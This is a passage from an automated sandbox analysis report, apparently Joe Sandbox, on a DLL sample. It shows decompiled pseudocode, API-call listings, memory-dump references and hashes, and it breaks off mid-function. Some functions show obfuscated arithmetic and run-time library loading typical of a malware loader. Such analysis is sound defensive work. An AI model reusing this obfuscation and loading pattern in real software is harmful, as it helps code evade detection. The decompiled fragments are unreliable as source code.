                          • Associated: 00000000.00000002.402632388.00007FF88C0A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402643514.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402657425.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff88c070000_loaddll64.jbxd
                          Similarity
                          • API ID: CallNamedPipe
                          • String ID: f6$}
                          • API String ID: 1741058652-3232957126
                          • Opcode ID: cca9b28b80d231eb5616da5a01d49f7b9c90829cfa428a0db1be8c7848e8995e
                          • Instruction ID: f3160b77f50d1c060eb03e7454eff4a5ebd391b80e3aa2ab6cc31718271802d4
                          • Opcode Fuzzy Hash: cca9b28b80d231eb5616da5a01d49f7b9c90829cfa428a0db1be8c7848e8995e
                          • Instruction Fuzzy Hash: 82D17C736196C58BD724CF15E4447EABBA4F388788F148129EB8917B58DB7CEA45CF00
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          C-Code - Quality: 93%
                          			E00007FF87FF88C074820(long long __rax, long long __rbx, void* __rcx, void* __r8, void* __r9, void* __r10) {
                          				void* __rsi;
                          				void* __rbp;
                          				void* __r13;
                          				void* __r15;
                          				signed int _t132;
                          				signed int _t134;
                          				signed int _t168;
                          				signed int _t183;
                          				signed int _t188;
                          				signed int _t190;
                          				signed int _t200;
                          				signed long long _t217;
                          				signed int _t219;
                          				signed long long _t223;
                          				signed long long _t226;
                          				void* _t235;
                          				void* _t237;
                          				void* _t239;
                          				void* _t241;
                          				void* _t242;
                          				void* _t244;
                          				void* _t247;
                          				void* _t248;
                          				long long _t249;
                          				void* _t251;
                          				void* _t253;
                          				signed int _t254;
                          				void* _t256;
                          				CHAR* _t258;
                          				signed long long _t259;
                          
                          				_t247 = __r10;
                          				_t246 = __r9;
                          				_t244 = __r8;
                          				_t221 = __rcx;
                          				_t218 = __rbx;
                          				 *((long long*)(_t241 + 0x10)) = __rbx;
                          				 *(_t241 + 0x20) = r9d;
                          				_push(_t239);
                          				_push(_t237);
                          				_push(_t235);
                          				_push(_t251);
                          				_push(_t253);
                          				_push(_t256);
                          				_t242 = _t241 - 0x80;
                          				r10d = __r9 - 0x3666;
                          				r12d =  *(_t242 + 0xf8);
                          				r14d = __r9 - 0x22c;
                          				 *(_t242 + 0xc0) = r10d;
                          				r8d =  *(_t242 + 0xe8);
                          				_t9 = _t221 - 0x27b2; // 0x0
                          				r8d = r8d + 0xffffee57;
                          				 *(_t242 + 0xd0) = _t9;
                          				 *(_t242 + 0x68) = r8d;
                          				r9d = __rax + 0x1563;
                          				r12d = r12d + 0x984;
                          				r13d = __rax - 0x2103;
                          				 *(_t242 + 0xe8) = r9d;
                          				_t132 = __r10 + 0x23f6;
                          				 *(_t242 + 0x60) = _t132;
                          				if (r9d - _t132 <= 0) goto 0x8c074ab2;
                          				r8d = _t256 - 0x2b1;
                          				r10d = r10d + 0x37e1;
                          				r11d = _t253 + 0x38e9;
                          				_t254 =  *((intOrPtr*)(_t242 + 0x118));
                          				_t21 = _t239 + 0x2598; // 0x2598
                          				 *(_t242 + 0x48) = _t21;
                          				 *(_t242 + 0x40) = _t235 - 0x44a;
                          				r15d = _t256 - 0x11ae;
                          				 *(_t242 + 0x38) = r8d;
                          				_t27 = _t239 + 0x228c; // 0x228c
                          				r9d = _t27;
                          				 *(_t242 + 0x30) = r10d;
                          				 *(_t242 + 0x28) = r15d;
                          				 *(_t242 + 0x20) = r11d;
                          				_t134 = E00007FF87FF88C08AA10(__rax, __rcx, _t254, __r8, __r9, _t258); // executed
                          				r8d =  *(_t242 + 0xe8);
                          				r10d = _t251 - 0x278;
                          				r12d =  *(_t242 + 0xd0);
                          				_t168 = __rbx - 0x150e;
                          				 *(_t242 + 0x50) = _t168;
                          				r14d = _t134;
                          				 *(_t242 + 0x48) = _t168;
                          				 *(_t242 + 0x40) = _t134 + 0xfffffa6f;
                          				r9d = _t251 + 0x27ae;
                          				r11d = _t237 + 0x189;
                          				 *(_t242 + 0x38) =  *(_t242 + 0x60);
                          				_t200 = _t237 + 0x495;
                          				 *(_t242 + 0x30) = r10d;
                          				 *(_t242 + 0x28) = r11d;
                          				r8d = r8d + 0x283;
                          				 *(_t242 + 0x20) = _t254;
                          				 *(_t242 + 0xf8) = __rbx + 0xf39 - 0x145b;
                          				E00007FF87FF88C077120( *(_t242 + 0x100), __rax, __rcx, _t254, __r8, __r9, _t247, _t248);
                          				LoadLibraryA(_t258);
                          				r10d = __rbx + 0x2ad;
                          				r11d = _t251 + 0x37e1;
                          				 *(_t242 + 0x50) = _t200;
                          				 *((long long*)(_t254 + 0x268)) = __rax;
                          				_t58 = _t237 + 0x1270; // 0x1270
                          				_t188 = _t58;
                          				_t60 = _t256 + 0x81; // 0x81
                          				r8d = _t60;
                          				 *((intOrPtr*)(_t254 + 0x120)) =  *((intOrPtr*)(_t254 + 0x120)) + ( *(_t254 + 0x1e0) | 0x0000343a);
                          				r9d = r15d;
                          				 *(_t242 + 0x48) = _t251 + 0x329d;
                          				 *(_t242 + 0x40) = r10d;
                          				 *(_t242 + 0x38) = r11d;
                          				 *(_t242 + 0x30) = _t235 + 0x1011;
                          				 *(_t242 + 0x28) = _t188;
                          				 *(_t242 + 0x20) = _t254;
                          				E00007FF87FF88C072730( *(_t254 + 0x1e0) | 0x0000343a, __rbx, _t254 + 0x160, _t237, _t244);
                          				r8d =  *(_t242 + 0xd8);
                          				_t71 = _t256 - 0x1270; // -4720
                          				r10d =  *(_t242 + 0xc0);
                          				 *(_t242 + 0x48) = r8d;
                          				_t75 = _t256 - 0xeb4; // -3764
                          				r11d = _t75;
                          				 *(_t242 + 0x40) = _t71;
                          				_t77 = _t237 + 0xcdf; // 0xcdf
                          				r9d = _t77;
                          				 *(_t242 + 0x38) = _t251 + 0x2103;
                          				r10d = r10d + 0x3a59;
                          				 *(_t242 + 0x30) = r10d;
                          				 *(_t242 + 0x28) = r11d;
                          				 *(_t242 + 0x20) = _t244 + 0x3f3;
                          				E00007FF87FF88C071000( *(_t254 + 0x1e0) | 0x0000343a, _t218, _t254 + 0x160, _t237, _t254, _t246);
                          				goto 0x8c074c65;
                          				_t219 =  *((intOrPtr*)(_t242 + 0x118));
                          				_t259 = r12d;
                          				if ( *((intOrPtr*)(_t219 + 0x80)) -  *(_t219 + 0x48) * _t259 > 0) goto 0x8c074ae9;
                          				if (r12d - (r8d & r12d) > 0) goto 0x8c074ae9;
                          				_t223 = r10d;
                          				 *(_t242 + 0x60) = _t223;
                          				if (_t259 - ( *((intOrPtr*)(_t219 + 0x90)) +  *((intOrPtr*)(_t219 + 0x70)) ^ _t223) > 0) goto 0x8c074c5f;
                          				_t183 = r9d ^ r12d;
                          				 *(_t242 + 0xd8) = _t183;
                          				_t249 = r9d * 0x36e7;
                          				 *((long long*)(_t242 + 0x70)) = _t249;
                          				 *(_t242 + 0x100) = r14d | 0x00001f2c;
                          				asm("o16 nop [eax+eax]");
                          				r8d = r8d *  *(_t219 + 0x40);
                          				_t217 =  *(_t219 + 0xc8) + _t249;
                          				r11d =  *(_t219 + 0x1c0);
                          				r11d = r11d + 0x1f2c;
                          				_t226 = r13d & _t259 ^ _t217;
                          				_t190 = _t188 * ( *(_t219 + 0x120) * r12d +  *((intOrPtr*)(_t219 + 0x60))) | r14d -  *((intOrPtr*)(_t219 + 0x110));
                          				 *(_t219 + 0xc8) = _t226;
                          				 *(_t242 + 0xf8) = _t190;
                          				r13d = r13d |  *(_t219 + 0x188) | _t183;
                          				r10d = _t217 + _t226;
                          				r9d =  *(_t242 + 0x100);
                          				 *(_t242 + 0x48) = ( *(_t219 + 0x1b8) | 0x0000343a) & r9d;
                          				r9d = r9d & _t200;
                          				 *(_t242 + 0x40) = _t219;
                          				 *(_t242 + 0x38) = r10d;
                          				 *(_t242 + 0x30) = r11d;
                          				 *(_t242 + 0x28) = _t190 &  *(_t219 + 0x150) & 0x00002032;
                          				 *(_t242 + 0x20) = r10d -  *((intOrPtr*)(_t219 + 0x218));
                          				E00007FF87FF88C0898F0(_t254 + 0x00003a59 & r14d, _t217, _t254, _t254, _t246, _t254);
                          				r12d = r12d + 4;
                          				 *(_t219 + 0x150) =  *(_t219 + 0x150) + _t226 - ( *(_t219 + 0xd8) ^  *(_t219 + 0x30));
                          				r9d =  *(_t242 + 0xe8);
                          				r10d =  *(_t242 + 0xc0);
                          				r8d =  *(_t242 + 0x68);
                          				if (r12d - ( *((intOrPtr*)(_t219 + 0x90)) +  *((intOrPtr*)(_t219 + 0x70)) ^  *(_t242 + 0x60)) <= 0) goto 0x8c074b40;
                          				goto 0x8c074c65;
                          				_t129 = _t239 + 0x3595; // 0x3595
                          				return _t129;
                          			}

































                          0x7ff88c074820
                          0x7ff88c074820
                          0x7ff88c074820
                          0x7ff88c074820
                          0x7ff88c074820
                          0x7ff88c074820
                          0x7ff88c074825
                          0x7ff88c07482a
                          0x7ff88c07482b
                          0x7ff88c07482c
                          0x7ff88c07482d
                          0x7ff88c07482f
                          0x7ff88c074831
                          0x7ff88c074835
                          0x7ff88c074843
                          0x7ff88c07484a
                          0x7ff88c074852
                          0x7ff88c07485c
                          0x7ff88c074864
                          0x7ff88c07486c
                          0x7ff88c074872
                          0x7ff88c074879
                          0x7ff88c074883
                          0x7ff88c074888
                          0x7ff88c07488f
                          0x7ff88c074896
                          0x7ff88c07489d
                          0x7ff88c0748a5
                          0x7ff88c0748ac
                          0x7ff88c0748b9
                          0x7ff88c0748bf
                          0x7ff88c0748c6
                          0x7ff88c0748cd
                          0x7ff88c0748d4
                          0x7ff88c0748dc
                          0x7ff88c0748e2
                          0x7ff88c0748ec
                          0x7ff88c0748f0
                          0x7ff88c0748f7
                          0x7ff88c0748fc
                          0x7ff88c0748fc
                          0x7ff88c074903
                          0x7ff88c07490e
                          0x7ff88c074919
                          0x7ff88c07491e
                          0x7ff88c074923
                          0x7ff88c07492b
                          0x7ff88c074933
                          0x7ff88c074948
                          0x7ff88c07494e
                          0x7ff88c074952
                          0x7ff88c074955
                          0x7ff88c07495e
                          0x7ff88c074962
                          0x7ff88c07496e
                          0x7ff88c074975
                          0x7ff88c074979
                          0x7ff88c07497f
                          0x7ff88c07498a
                          0x7ff88c07498f
                          0x7ff88c074998
                          0x7ff88c07499f
                          0x7ff88c0749a6
                          0x7ff88c0749b4
                          0x7ff88c0749c1
                          0x7ff88c0749cf
                          0x7ff88c0749d7
                          0x7ff88c0749e1
                          0x7ff88c0749e8
                          0x7ff88c0749e8
                          0x7ff88c0749f5
                          0x7ff88c0749f5
                          0x7ff88c074a08
                          0x7ff88c074a1d
                          0x7ff88c074a20
                          0x7ff88c074a24
                          0x7ff88c074a29
                          0x7ff88c074a2e
                          0x7ff88c074a32
                          0x7ff88c074a36
                          0x7ff88c074a3b
                          0x7ff88c074a40
                          0x7ff88c074a48
                          0x7ff88c074a4f
                          0x7ff88c074a5f
                          0x7ff88c074a64
                          0x7ff88c074a64
                          0x7ff88c074a6b
                          0x7ff88c074a6f
                          0x7ff88c074a6f
                          0x7ff88c074a7d
                          0x7ff88c074a81
                          0x7ff88c074a8f
                          0x7ff88c074a97
                          0x7ff88c074a9c
                          0x7ff88c074aa0
                          0x7ff88c074aad
                          0x7ff88c074ab2
                          0x7ff88c074aba
                          0x7ff88c074acc
                          0x7ff88c074ad7
                          0x7ff88c074af4
                          0x7ff88c074afa
                          0x7ff88c074b02
                          0x7ff88c074b12
                          0x7ff88c074b15
                          0x7ff88c074b1c
                          0x7ff88c074b27
                          0x7ff88c074b2c
                          0x7ff88c074b37
                          0x7ff88c074b4a
                          0x7ff88c074b4f
                          0x7ff88c074b52
                          0x7ff88c074b5c
                          0x7ff88c074b66
                          0x7ff88c074b72
                          0x7ff88c074b74
                          0x7ff88c074b85
                          0x7ff88c074b92
                          0x7ff88c074bad
                          0x7ff88c074bc9
                          0x7ff88c074bd1
                          0x7ff88c074bd5
                          0x7ff88c074bd8
                          0x7ff88c074bdd
                          0x7ff88c074be2
                          0x7ff88c074be7
                          0x7ff88c074beb
                          0x7ff88c074bef
                          0x7ff88c074bfb
                          0x7ff88c074c12
                          0x7ff88c074c2b
                          0x7ff88c074c33
                          0x7ff88c074c3b
                          0x7ff88c074c52
                          0x7ff88c074c5d
                          0x7ff88c074c5f
                          0x7ff88c074c7f

                          APIs
                          • LoadLibraryA.KERNEL32 ref: 00007FF88C0749B4
                            • Part of subcall function 00007FF88C072730: GetProcAddress.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,00001270,00007FF88C074A40), ref: 00007FF88C07285E
                            • Part of subcall function 00007FF88C071000: GetProcAddress.KERNEL32 ref: 00007FF88C0710D5
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.402580217.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000000.00000002.402568884.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402605810.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402623535.00007FF88C0A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402632388.00007FF88C0A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402643514.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402657425.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff88c070000_loaddll64.jbxd
                          Similarity
                          • API ID: AddressProc$LibraryLoad
                          • String ID: 62 $662
                          • API String ID: 2238633743-980518382
                          • Opcode ID: 48cd3dc5dbe79548c78c3c476827d8e2c43b836f350b0e5477a016c5a382e463
                          • Instruction ID: 42ea4e64debd84b0d3d4b220fab369ae37b6f1b73b3d2f1d48e9ede23fc55d6b
                          • Opcode Fuzzy Hash: 48cd3dc5dbe79548c78c3c476827d8e2c43b836f350b0e5477a016c5a382e463
                          • Instruction Fuzzy Hash: 16B18C776186C5CBD765CF24E484BDABBA4F788788F004125EB8A57B58DB38EA54CF00
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          C-Code - Quality: 52%
                          			E00007FF87FF88C07D734(void* __ecx, intOrPtr* __rax, long long __rbx, void* __rcx, void* __r8, long long _a8, signed int _a16, signed int _a24, signed int _a32) {
                          				long long _v56;
                          				void* __rdi;
                          				void* __rsi;
                          				void* __rbp;
                          				void* _t27;
                          				intOrPtr _t36;
                          				intOrPtr* _t62;
                          				long long _t68;
                          				void* _t70;
                          				long long _t84;
                          				signed int _t85;
                          				intOrPtr* _t86;
                          				void* _t89;
                          
                          				_t70 = __rcx;
                          				_a8 = __rbx;
                          				_t2 = _t70 - 1; // -1
                          				r14d = __ecx;
                          				if (_t2 - 1 <= 0) goto 0x8c07d768;
                          				_t27 = E00007FF87FF88C07E6A0(__rax);
                          				 *__rax = 0x16;
                          				E00007FF87FF88C07E580(_t27);
                          				goto 0x8c07d897;
                          				E00007FF87FF88C0805F8();
                          				r8d = 0x104;
                          				GetModuleFileNameA(??, ??, ??);
                          				_t86 =  *0x8c0b4950; // 0x27ed37732a0
                          				 *0x8c0b4960 = 0x8c0b43e0;
                          				if (_t86 == 0) goto 0x8c07d79f;
                          				if ( *_t86 != dil) goto 0x8c07d7a2;
                          				_t62 =  &_a32;
                          				_a24 = _t85;
                          				_v56 = _t62;
                          				r8d = 0;
                          				_a32 = _t85;
                          				E00007FF87FF88C07D514(0x8c0b43e0, 0x8c0b43e0, 0x8c0b43e0, _t85, 0x8c0b43e0, _t89, __r8,  &_a24);
                          				r8d = 1;
                          				E00007FF87FF88C07D6D0(_a24, _a32, __r8);
                          				_t68 = _t62;
                          				if (_t62 != 0) goto 0x8c07d7f3;
                          				E00007FF87FF88C07E6A0(_t62);
                          				_t10 = _t68 + 0xc; // 0xc
                          				 *_t62 = _t10;
                          				goto 0x8c07d892;
                          				_v56 =  &_a32;
                          				E00007FF87FF88C07D514(_t68, 0x8c0b43e0, _t68, _t85, 0x8c0b43e0, _t89, _t62 + _a24 * 8,  &_a24);
                          				if (r14d != 1) goto 0x8c07d829;
                          				_t36 = _a24 - 1;
                          				 *0x8c0b4940 = _t68;
                          				 *0x8c0b493c = _t36;
                          				goto 0x8c07d7ec;
                          				_a16 = _t85;
                          				0x8c07fef4();
                          				if (_t36 == 0) goto 0x8c07d858;
                          				E00007FF87FF88C07E114( &_a32, _a16);
                          				_a16 = _t85;
                          				E00007FF87FF88C07E114( &_a32, _t68);
                          				goto 0x8c07d897;
                          				_t84 = _a16;
                          				if ( *_t84 == _t85) goto 0x8c07d873;
                          				if ( *((intOrPtr*)(_t84 + 8)) != _t85) goto 0x8c07d867;
                          				 *0x8c0b493c = 0;
                          				_a16 = _t85;
                          				 *0x8c0b4940 = _t84;
                          				E00007FF87FF88C07E114(_t84 + 8, _t85 + 1);
                          				_a16 = _t85;
                          				E00007FF87FF88C07E114(_t84 + 8, _t68);
                          				return _t36;
                          			}
















                          0x7ff88c07d734
                          0x7ff88c07d734
                          0x7ff88c07d747
                          0x7ff88c07d74a
                          0x7ff88c07d750
                          0x7ff88c07d752
                          0x7ff88c07d75c
                          0x7ff88c07d75e
                          0x7ff88c07d763
                          0x7ff88c07d768
                          0x7ff88c07d774
                          0x7ff88c07d77f
                          0x7ff88c07d785
                          0x7ff88c07d78e
                          0x7ff88c07d798
                          0x7ff88c07d79d
                          0x7ff88c07d7a2
                          0x7ff88c07d7a6
                          0x7ff88c07d7ae
                          0x7ff88c07d7b3
                          0x7ff88c07d7b6
                          0x7ff88c07d7bf
                          0x7ff88c07d7c8
                          0x7ff88c07d7d5
                          0x7ff88c07d7da
                          0x7ff88c07d7e0
                          0x7ff88c07d7e2
                          0x7ff88c07d7e7
                          0x7ff88c07d7ea
                          0x7ff88c07d7ee
                          0x7ff88c07d805
                          0x7ff88c07d80a
                          0x7ff88c07d813
                          0x7ff88c07d818
                          0x7ff88c07d81a
                          0x7ff88c07d821
                          0x7ff88c07d827
                          0x7ff88c07d82d
                          0x7ff88c07d834
                          0x7ff88c07d83d
                          0x7ff88c07d843
                          0x7ff88c07d84b
                          0x7ff88c07d84f
                          0x7ff88c07d856
                          0x7ff88c07d858
                          0x7ff88c07d865
                          0x7ff88c07d871
                          0x7ff88c07d873
                          0x7ff88c07d87b
                          0x7ff88c07d87f
                          0x7ff88c07d886
                          0x7ff88c07d88e
                          0x7ff88c07d892
                          0x7ff88c07d8a9

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.402580217.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000000.00000002.402568884.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402605810.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402623535.00007FF88C0A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402632388.00007FF88C0A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402643514.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402657425.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff88c070000_loaddll64.jbxd
                          Similarity
                          • API ID: FileModuleName_invalid_parameter_noinfo
                          • String ID: C:\Windows\system32\loaddll64.exe
                          • API String ID: 3307058713-3772592933
                          • Opcode ID: 608f3a59dde5b4256447cf5f0bb571404734e00e084907b6274e3e22c00ab3e2
                          • Instruction ID: 984c6c71b5a5e1382077036644576bf3a30590c0c01921f22234c157db7f73b2
                          • Opcode Fuzzy Hash: 608f3a59dde5b4256447cf5f0bb571404734e00e084907b6274e3e22c00ab3e2
                          • Instruction Fuzzy Hash: F841AE32A09B5A8AEF58DF26E8400B867A4FF56BD4F544031EA4D07B49EF3EE541C700
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.402580217.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000000.00000002.402568884.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402605810.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402623535.00007FF88C0A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402632388.00007FF88C0A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402643514.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402657425.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff88c070000_loaddll64.jbxd
                          Similarity
                          • API ID: FileHandleType
                          • String ID: @
                          • API String ID: 3000768030-2766056989
                          • Opcode ID: 030a26946847c2795ed0f47b31f85d15f36678cd1225752ab7634676368a263a
                          • Instruction ID: 272737084f694f5981accc06e7611bf55abec3b8f15265785a7cfa3449f673c9
                          • Opcode Fuzzy Hash: 030a26946847c2795ed0f47b31f85d15f36678cd1225752ab7634676368a263a
                          • Instruction Fuzzy Hash: C4212D62A18B4241EF748B2AE8901392691FB47BF8F345335D6AE077DCCF29E881D241
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          C-Code - Quality: 65%
                          			E00007FF87FF88C07B89C(void* __ecx) {
                          				void* __rbx;
                          				void* _t12;
                          				void* _t17;
                          				void* _t18;
                          				void* _t19;
                          				void* _t20;
                          
                          				_t2 =  ==  ? 1 :  *0x8c0b41f8 & 0x000000ff;
                          				 *0x8c0b41f8 =  ==  ? 1 :  *0x8c0b41f8 & 0x000000ff;
                          				E00007FF87FF88C07BDF4(1, _t12, _t17, _t18, _t19, _t20);
                          				if (E00007FF87FF88C07C7DC() != 0) goto 0x8c07b8cb;
                          				goto 0x8c07b8df; // executed
                          				E00007FF87FF88C07E090(_t17); // executed
                          				if (0 != 0) goto 0x8c07b8dd;
                          				E00007FF87FF88C07C838(0);
                          				goto 0x8c07b8c7;
                          				return 1;
                          			}









                          0x7ff88c07b8b0
                          0x7ff88c07b8b3
                          0x7ff88c07b8b9
                          0x7ff88c07b8c5
                          0x7ff88c07b8c9
                          0x7ff88c07b8cb
                          0x7ff88c07b8d2
                          0x7ff88c07b8d6
                          0x7ff88c07b8db
                          0x7ff88c07b8e4

                          APIs
                          • __isa_available_init.LIBCMT ref: 00007FF88C07B8B9
                          • __vcrt_initialize.LIBVCRUNTIME ref: 00007FF88C07B8BE
                            • Part of subcall function 00007FF88C07C7DC: __vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00007FF88C07C7E0
                            • Part of subcall function 00007FF88C07C7DC: __vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00007FF88C07C7E5
                            • Part of subcall function 00007FF88C07C7DC: __vcrt_initialize_locks.LIBVCRUNTIME ref: 00007FF88C07C7EA
                          • __vcrt_uninitialize.LIBVCRUNTIME ref: 00007FF88C07B8D6
                          Memory Dump Source
                          • Source File: 00000000.00000002.402580217.00007FF88C071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF88C070000, based on PE: true
                          • Associated: 00000000.00000002.402568884.00007FF88C070000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402605810.00007FF88C093000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402623535.00007FF88C0A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402632388.00007FF88C0A9000.00000008.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402643514.00007FF88C0B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.402657425.00007FF88C0B6000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7ff88c070000_loaddll64.jbxd
                          Similarity
                          • API ID: __isa_available_init__vcrt_initialize__vcrt_initialize_locks__vcrt_initialize_pure_virtual_call_handler__vcrt_initialize_winapi_thunks__vcrt_uninitialize
                          • String ID:
                          • API String ID: 3388242289-0
                          • Opcode ID: 069ba207e829dfcd2a7a09410ea271609d7bb695ba881f2a8a90ee759a22d1bf
                          • Instruction ID: a41d61d37a51fe70c53bfa2300363880e6f17091077ea51712f1c68653b8dcab
                          • Opcode Fuzzy Hash: 069ba207e829dfcd2a7a09410ea271609d7bb695ba881f2a8a90ee759a22d1bf
                          • Instruction Fuzzy Hash: ACE01250E0D18345FD9C276190526B81B402F373C4F0414B5D86D861CBCF0F658AE631
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 66%
                          			E00007FF87FF88C07A970(long long __rax, void* __rcx, long long __rdi, long long __rsi, void* __r8, void* __r10, long long __r12) {
                          				void* __rbx;
                          				void* __rbp;
                          				void* __r13;
                          				void* __r14;
                          				void* __r15;
                          				void* _t109;
                          				void* _t116;
                          				void* _t148;
                          				void* _t149;
                          				long long _t151;
                          				signed long long _t154;
                          				signed long long _t161;
                          				signed long long _t165;
                          				void* _t166;
                          				long long _t167;
                          				void* _t178;
                          				void* _t180;
                          				void* _t181;
                          				void* _t184;
                          				void* _t186;
                          				long long _t188;
                          				void* _t190;
                          				void* _t192;
                          				void* _t194;
                          
                          				_t151 = __rax;
                          				_t186 = _t180;
                          				 *(_t186 + 0x18) = r8d;
                          				_push(_t161);
                          				_push(_t178);
                          				_push(_t190);
                          				_t181 = _t180 - 0xa0;
                          				r15d =  *(_t181 + 0x100);
                          				r14d =  *(_t181 + 0x110);
                          				r15d = r15d + 0x119f;
                          				 *((intOrPtr*)(_t181 + 0xd0)) = __rcx - 0x44a;
                          				r10d = __rax - 0x283;
                          				 *(_t181 + 0x84) = r15d;
                          				r13d = __rax + 0x170;
                          				 *(_t181 + 0x80) = r10d;
                          				r14d = r14d + 0x9d7;
                          				 *(_t181 + 0x88) = r14d;
                          				 *((intOrPtr*)(_t181 + 0x148)) = __rcx - 0x36e7;
                          				r8d = __rax - 0x16a;
                          				r9d = __rax + 0xd93;
                          				 *(_t181 + 0x100) = r8d;
                          				_t19 = _t161 + 0x2598; // 0x2598
                          				 *(_t181 + 0x110) = r9d;
                          				if (r13d - _t19 < 0) goto 0x8c07ae64;
                          				 *((long long*)(_t186 + 0x10)) = __rsi;
                          				 *((long long*)(_t186 - 0x30)) = __rdi;
                          				 *((long long*)(_t186 - 0x38)) = __r12;
                          				if (r15d == __r10 - 0x173a) goto 0x8c07acf1;
                          				_t188 =  *((intOrPtr*)(_t181 + 0x130));
                          				r10d = 0x3a59;
                          				r9d = r10d;
                          				 *(_t181 + 0x28) = 0x38e9;
                          				_t167 = _t188;
                          				 *(_t181 + 0x20) = r10w;
                          				r8d = 0x23f6; // executed
                          				E00007FF87FF88C079AC0(_t161, __rcx, _t167, _t178, _t194); // executed
                          				r11d = _t178 + 0x37e1;
                          				r9d =  *(_t181 + 0x84);
                          				r10d = _t194 + 0x4c4;
                          				r8d = _t190 - 0x14c1;
                          				 *((long long*)(_t181 + 0x78)) = _t188;
                          				 *((long long*)(_t188 + 0x340)) = _t151;
                          				r15d = r15d + 0xfffff21d;
                          				r9d = r9d + 0xfffff219;
                          				_t154 =  *((intOrPtr*)(_t188 + 0x198)) + 0x0000329d | 0x0000666a;
                          				 *(_t188 + 0x28) =  *(_t188 + 0x28) | _t154;
                          				_t42 = _t161 + 0x27b2; // 0x27b2
                          				 *(_t181 + 0x110) = _t42;
                          				 *((intOrPtr*)(_t181 + 0x70)) = _t190 - 0x278;
                          				r14d = _t190 - 0x17cd;
                          				 *(_t181 + 0x68) = r10d;
                          				 *((intOrPtr*)(_t181 + 0x60)) = r11d;
                          				 *((intOrPtr*)(_t181 + 0x58)) = _t192 + 0x40c;
                          				 *(_t181 + 0x50) = _t190 - 0x12ab;
                          				 *((intOrPtr*)(_t181 + 0x48)) =  *((intOrPtr*)(_t181 + 0xe0));
                          				 *((intOrPtr*)(_t181 + 0x40)) = _t167 + 0x1555;
                          				 *(_t181 + 0x38) =  *(_t181 + 0x110);
                          				 *((intOrPtr*)(_t181 + 0x30)) =  *((intOrPtr*)(_t181 + 0xd0)) + 0xfffff515;
                          				 *(_t181 + 0x28) = r14d;
                          				 *(_t181 + 0x20) = r15d;
                          				_t109 = E00007FF87FF88C088680( *((intOrPtr*)(_t181 + 0x148)) + 0x30d5, _t161, __rcx, _t167, __rsi, __r8, _t184, __r10, _t188, _t190, _t194); // executed
                          				r9d = 0x1f2c;
                          				 *(_t181 + 0x28) = _t161;
                          				r8d = 0x329d;
                          				 *(_t181 + 0x20) = 0x343a;
                          				E00007FF87FF88C079AC0(_t161, __rcx, _t188, _t178, _t192); // executed
                          				 *(_t188 + 0x358) = _t154;
                          				_t165 =  *((intOrPtr*)(_t188 + 0x1b0)) + _t161;
                          				 *( *_t188 + 0x1e0) =  *( *_t188 + 0x1e0) | _t165;
                          				r8d =  *( *((intOrPtr*)(_t188 + 0x40)) + 0x150);
                          				r8d = r8d ^ 0x000017cd;
